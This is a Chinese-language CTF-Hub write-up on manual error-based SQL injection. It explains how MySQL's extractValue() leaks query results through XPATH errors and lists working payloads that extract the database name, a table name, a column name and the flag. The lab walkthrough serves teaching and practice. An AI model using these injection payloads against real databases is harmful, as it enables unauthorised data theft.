CTF-Hub SQL 报错注入(纯手动注入)

当输入1时,发现只有查询正确,基本上可以判断出没有回显

开始注入(工具hackerBar)

题目是报错注入,方向就比较明显,大致说一下用到的函数和原理。

常见报错注入函数:

  1. 通过 floor() 报错注入
  2. 通过 extractValue() 报错注入
  3. 通过 updateXml() 报错注入
  4. 通过 NAME_Const() 报错注入
  5. 通过 join() 报错注入
  6. 通过 exp() 报错注入

不常见报错注入函数:

  1. 通过 geometryCollection() 报错注入
  2. 通过 polygon() 报错注入
  3. 通过 multipoint() 报错注入
  4. 通过 multlinestring() 报错注入
  5. 通过 multpolygon() 报错注入
  6. 通过 linestring() 报错注入

extractValue() 报错注入

函数 extractValue() 包含两个参数 ,第一个参数是 XML文档对象名称 ,第二个参数是 路径

格式:

sql 复制代码
extractvalue(列名,'查询内容路径')

当查询的路径不存在时,,也不会报错:

sql 复制代码
select extractvalue(doc,'/xxx/xxxx/xxxxx') from xml;

但第二个查询路径必须以斜杠(/)开始,否则将引起报错

构造报错 sql 的语句:

sql 复制代码
select extractvalue(doc,'~/xxx/xxxx/xxxxx') from xml;

报错语句:

bash 复制代码
ERROR 2013 (HY000): Lost connection to MySQL server during query
No connection. Trying to reconnect...
Connection id:    97
Current database: dbxx

ERROR 1105 (HY000): XPATH syntax error: '~xxx/xxxx/xxxxx'

原理

在ASCII码表中,0x7e这个十六进制数代表符号~,~这个符号在xpath语法中是不存在的,因此总能报错。同理,肯定也有其他字符是XPATH语法不支持的。 ! 也是不支持的,因此也可以使用。

开始注入(工具hackerBar)

与其他注入其实语句和思路相同,只需要把红字替换成你需要的 sql语句 即可回显

1 and extractValue(1,concat(0x7e,(select database()))) --+

此时已经得到数据库名:sqli

爆表和爆列在上一节已经讲过:

CTF-Hub SQL 字符型注入(纯手动注入)

语句我也贴一下:

爆表:

sql 复制代码
1 and extractValue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1)))  --+

爆列(列名也是 flag):

sql 复制代码
1 and extractValue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)))  --+

拿到flag:

sql 复制代码
1 and extractValue(1,concat(0x7e,(select flag from flag)))  --+
相关推荐
摸鱼也很难4 天前
php反序列化 && ctf例题演示 框架安全(TP,Yii,Laravel)&& phpggc生成框架利用pop
php·ctf·php反序列化·审计·ctf web题目
Mr_Fmnwon5 天前
【我的 PWN 学习手札】IO_FILE 之 FSOP
pwn·ctf·io_file
SRC_BLUE_177 天前
攻防世界 - Misc - Level 1 | Banmabanma
网络安全·ctf
摸鱼也很难8 天前
ctfshow 每日练习 web 区 php特性 1-10
php·ctf·ctf web题目
亿.614 天前
2024国城杯 Web
web·ctf·writeup·比赛复现
WTT001115 天前
CTFshow-SSRF&文件上传
大数据·运维·网络·安全·web安全·ctf
Z3r4y18 天前
【Web】2024“国城杯”网络安全挑战大赛决赛题解(全)
web·ctf·wp·国城杯·国城杯决赛
WTT001119 天前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
摸鱼也很难19 天前
RCE 命令执行漏洞 && 过滤模式 && 基本的过滤问题 && 联合ctf题目进行实践
漏洞·ctf·ctfshow·rce命令执行
亿.619 天前
2024楚慧杯-Web
web·ctf·writeup